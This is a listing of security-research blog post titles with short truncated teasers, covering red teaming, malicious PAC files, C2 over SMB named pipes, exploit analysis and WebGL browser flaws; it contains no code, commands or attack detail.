Subverting the Agent on Network PATROL
A Red Team engagement led to the team discovering unprotected credentials encrypted with an infrastructure management product from software provider BMC.Opportunities multiply as they are seized.I like...
View ArticleRDP Replay Code Release
In one of our previous blog posts, we wrote about how during routine monitoring on a client network, Context analysts noticed some unexpected RDP traffic and on further investigation it was found to be...
View ArticleThe rise and rise of red teaming
Red team testing is increasingly being employed by organisations across the business spectrum, but particularly in the banking and finance sector, to identify vulnerabilities that could leave them open...
View ArticleBluetooth LE - Increasingly popular, but still not very private
In May last year we wrote a blog post on our initial research on Bluetooth Low Energy (BLE). This covered our research into the new protocol, including what devices were using it, how it works, and...
View ArticleThe Security of HTTP-Headers
When it comes to web application security one often thinks about the obvious: Sanitize user input, transmit data over encrypted channels and use secure functions. Often overlooked are the positive...
View ArticleBinary SMS - The old backdoor to your new thing
Despite being older than many of its users, Short Messaging Service (SMS) remains a very popular communications medium and is increasingly found on remote sensors, critical infrastructure and vehicles...
View ArticleSniffing HTTPS URLS with malicious PAC files
In March this year we discovered an issue with the way many web browsers and operating systems handle Proxy Auto-Config (PAC) files. PAC files are JavaScript code that tell the browser which proxy to...
View ArticleObfuscation, Encryption & Unicorns… Reversing the string encryption in the...
Like many others I was happy to read the news that team Pangu released a jailbreak for iOS 9.3.3. A jailbroken device is especially useful in the field of security research, where we rely on root...
View ArticleAttacks on HTTPS via malicious PAC files
In our last blog post, Sniffing HTTPS URLS with malicious PAC files, we described issues identified in the implementation of PAC files in various web browsers and operating systems. In this post we...
View ArticleManually Testing SSL/TLS Weaknesses 2016 Edition
In 2015 we published a blogpost that explained how to manually test for the most common SSL/TLS weaknesses. This has become one of the most popular posts on our blog and so we have decided to write an...
View ArticleUsing SMB named pipes as a C2 channel
Intrusion detection systems are becoming increasingly more capable of detecting malicious activity on the corporate perimeter, local network environment and on individual hosts. Commonly, when...
View ArticleAnalysing and repurposing Spartan's CVE-2015-7645
For this blog post we’ve chosen to analyse a Flash exploit utilised by the Spartan Exploit Kit, namely CVE-2015-7645. We'll go through the process of analysing the obfuscated Flash file, deshelling it...
View ArticlePorting exploits to a Netgear WNR2200
Software vulnerabilities and the accompanying exploits are still all too common. Fortunately the response to vulnerabilities has got significantly better in recent years with quick patching of the most...
View ArticleServer Technologies - JBoss RMI Twiddling
Context encounters a wide range of server technologies during the course of penetration testing, often there are known vulnerabilities that can be used to exploit them, other times Context create new...
View ArticleSmartPhones - Can you Trust your USB Charger?
One of the biggest trends in the consumer electronics sector, over the past few years, has been the rise in the use of the now ubiquitous USB connection as the primary mechanism to charge a portable...
View ArticleServer Technologies - SSL2: Should it keep you awake at night?
One of the issues Context encounters time and time again is web servers that support version 2 of the SSL protocol. The weaknesses in SSL2 are a significant issue that has been known about for fifteen...
View ArticleSAP Exploitation – Part 1
In this series of posts I aim to cover in depth some of the publically known infrastructure vulnerabilities that affect SAP (which stands for "Systems, Applications and Products in Data Processing")...
View ArticleWebGL - A New Dimension for Browser Exploitation
Update: 11th May 2011 - Due to the high level of interest in Context’s blog posting on the Security issues within WebGL we are releasing the following FAQ. SummaryWebGL is a new web standard for...
View ArticleUPDATE: WebGL FAQ
Due to the high level of interest in Context’s blog posting on the Security issues within WebGL we are releasing the following further information to aid in the understanding of the issues. “Am I...
View ArticleWebGL – More WebGL Security Flaws
SummaryIn this blog post Context demonstrates how to steal user data through web browsers using a vulnerability in Firefox’s implementation of WebGL. This is a continuation of our research into serious...
View Article